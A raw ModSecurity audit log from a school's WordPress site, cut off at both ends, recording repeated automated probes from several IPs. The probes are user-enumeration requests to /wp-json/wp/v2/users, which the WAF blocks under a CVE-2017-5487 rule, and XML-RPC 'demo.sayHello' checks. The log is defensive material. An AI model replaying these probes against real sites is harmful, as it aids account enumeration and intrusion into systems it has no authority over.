userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746457485623724 6602 (- - -) Stopwatch2: 1746457485623724 6602; combined=4701, p1=612, p2=3832, p3=42, p4=42, p5=101, sr=76, sw=72, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0b151d64-Z-- --ca939312-A-- [05/May/2025:22:15:05 +0700] aBjV-fZJDMuQndL03JNTcwAAAEQ 103.236.140.4 44620 103.236.140.4 8181 --ca939312-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.176.47 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.176.47 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --ca939312-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ca939312-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746458105493640 2941 (- - -) Stopwatch2: 1746458105493640 2941; combined=1242, p1=400, p2=814, p3=0, p4=0, p5=28, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ca939312-Z-- --30cdde6a-A-- [05/May/2025:22:15:08 +0700] aBjV_PZJDMuQndL03JNTegAAAEI 103.236.140.4 44648 103.236.140.4 8181 --30cdde6a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.176.47 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.176.47 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --30cdde6a-C-- demo.sayHello --30cdde6a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --30cdde6a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746458108236818 6164 (- - -) Stopwatch2: 1746458108236818 6164; combined=4487, p1=552, p2=3693, p3=36, p4=36, p5=99, sr=73, sw=71, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --30cdde6a-Z-- --f79bc818-A-- [05/May/2025:22:22:48 +0700] aBjXyPZJDMuQndL03JNUmgAAAEI 103.236.140.4 48486 103.236.140.4 8181 --f79bc818-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.37.212 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.37.212 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f79bc818-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f79bc818-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746458568771157 3971 (- - -) Stopwatch2: 1746458568771157 3971; combined=2437, p1=631, p2=1751, p3=0, p4=0, p5=55, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f79bc818-Z-- --bf801e78-A-- [05/May/2025:22:22:51 +0700] aBjXy4ZWvR7-42f6JrAEeAAAAMo 103.236.140.4 48514 103.236.140.4 8181 --bf801e78-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.37.212 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.37.212 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --bf801e78-C-- demo.sayHello --bf801e78-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --bf801e78-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746458571568346 6203 (- - -) Stopwatch2: 1746458571568346 6203; combined=4536, p1=588, p2=3684, p3=31, p4=34, p5=115, sr=123, sw=84, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bf801e78-Z-- --d05b9f39-A-- [05/May/2025:22:23:04 +0700] aBjX2ARwKNFSM6B7_LaaRgAAAIM 103.236.140.4 48602 103.236.140.4 8181 --d05b9f39-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.177.123 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.177.123 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d05b9f39-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d05b9f39-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746458584916008 2625 (- - -) Stopwatch2: 1746458584916008 2625; combined=1251, p1=422, p2=797, p3=0, p4=0, p5=32, sr=91, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d05b9f39-Z-- --e18faa46-A-- [05/May/2025:22:23:07 +0700] aBjX202V_h1VFAgsfgZ2CAAAABQ 103.236.140.4 48630 103.236.140.4 8181 --e18faa46-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.177.123 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.177.123 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --e18faa46-C-- demo.sayHello --e18faa46-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --e18faa46-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746458587991277 6085 (- - -) Stopwatch2: 1746458587991277 6085; combined=4393, p1=514, p2=3640, p3=35, p4=36, p5=98, sr=73, sw=70, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e18faa46-Z-- --46c46e10-A-- [05/May/2025:22:23:21 +0700] aBjX6QRwKNFSM6B7_LaaSAAAAIg 103.236.140.4 48730 103.236.140.4 8181 --46c46e10-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.33.17 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.33.17 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --46c46e10-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --46c46e10-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746458601770787 2698 (- - -) Stopwatch2: 1746458601770787 2698; combined=1493, p1=468, p2=995, p3=0, p4=0, p5=30, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --46c46e10-Z-- --acf13923-A-- [05/May/2025:22:23:24 +0700] aBjX7ARwKNFSM6B7_LaaSgAAAJU 103.236.140.4 48762 103.236.140.4 8181 --acf13923-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.33.17 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.33.17 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --acf13923-C-- demo.sayHello --acf13923-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --acf13923-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746458604675169 5483 (- - -) Stopwatch2: 1746458604675169 5483; combined=4043, p1=524, p2=3292, p3=40, p4=33, p5=91, sr=71, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --acf13923-Z-- --5e070834-A-- [05/May/2025:22:24:30 +0700] aBjYLoZWvR7-42f6JrAE_wAAAMw 103.236.140.4 49320 103.236.140.4 8181 --5e070834-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.96.198 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.96.198 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --5e070834-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5e070834-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746458670680393 2605 (- - -) Stopwatch2: 1746458670680393 2605; combined=1427, p1=441, p2=949, p3=0, p4=0, p5=37, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5e070834-Z-- --abc7423e-A-- [05/May/2025:22:24:33 +0700] aBjYMYZWvR7-42f6JrAFBQAAAMM 103.236.140.4 49348 103.236.140.4 8181 --abc7423e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.96.198 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.96.198 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --abc7423e-C-- demo.sayHello --abc7423e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --abc7423e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746458673582459 6188 (- - -) Stopwatch2: 1746458673582459 6188; combined=4364, p1=562, p2=3572, p3=30, p4=31, p5=100, sr=74, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --abc7423e-Z-- --7408e410-A-- [05/May/2025:22:24:34 +0700] aBjYMvZJDMuQndL03JNUrwAAAFg 103.236.140.4 49358 103.236.140.4 8181 --7408e410-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.100.184 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.100.184 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --7408e410-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7408e410-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746458674314800 2907 (- - -) Stopwatch2: 1746458674314800 2907; combined=1227, p1=417, p2=775, p3=0, p4=0, p5=34, sr=79, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7408e410-Z-- --ff754b7f-A-- [05/May/2025:22:24:37 +0700] aBjYNfZJDMuQndL03JNUtwAAAFc 103.236.140.4 49392 103.236.140.4 8181 --ff754b7f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.100.184 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.100.184 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --ff754b7f-C-- demo.sayHello --ff754b7f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --ff754b7f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746458677271894 5459 (- - -) Stopwatch2: 1746458677271894 5459; combined=4398, p1=536, p2=3638, p3=36, p4=33, p5=92, sr=74, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ff754b7f-Z-- --55505130-A-- [05/May/2025:22:25:17 +0700] aBjYXYZWvR7-42f6JrAFRgAAAMQ 103.236.140.4 49736 103.236.140.4 8181 --55505130-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.92.41 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.92.41 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --55505130-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --55505130-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746458717855631 2514 (- - -) Stopwatch2: 1746458717855631 2514; combined=1188, p1=396, p2=763, p3=0, p4=0, p5=29, sr=107, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --55505130-Z-- --00650627-A-- [05/May/2025:22:25:20 +0700] aBjYYIZWvR7-42f6JrAFTAAAANE 103.236.140.4 49760 103.236.140.4 8181 --00650627-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.176.34 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.176.34 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --00650627-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --00650627-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746458720221064 3226 (- - -) Stopwatch2: 1746458720221064 3226; combined=1272, p1=450, p2=792, p3=0, p4=0, p5=29, sr=84, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --00650627-Z-- --39f3a21a-A-- [05/May/2025:22:25:20 +0700] aBjYYIZWvR7-42f6JrAFTQAAANY 103.236.140.4 49762 103.236.140.4 8181 --39f3a21a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.92.41 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.92.41 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --39f3a21a-C-- demo.sayHello --39f3a21a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --39f3a21a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746458720612427 4865 (- - -) Stopwatch2: 1746458720612427 4865; combined=3882, p1=463, p2=3221, p3=22, p4=27, p5=88, sr=69, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --39f3a21a-Z-- --97473d64-A-- [05/May/2025:22:25:22 +0700] aBjYYoZWvR7-42f6JrAFUwAAAMU 103.236.140.4 49788 103.236.140.4 8181 --97473d64-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.176.34 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.176.34 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --97473d64-C-- demo.sayHello --97473d64-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --97473d64-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746458722954269 5716 (- - -) Stopwatch2: 1746458722954269 5716; combined=4213, p1=528, p2=3461, p3=32, p4=36, p5=92, sr=74, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --97473d64-Z-- --b873b830-A-- [05/May/2025:22:25:56 +0700] aBjYhPZJDMuQndL03JNUxQAAAFA 103.236.140.4 50052 103.236.140.4 8181 --b873b830-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.47.174 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.47.174 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b873b830-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b873b830-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at 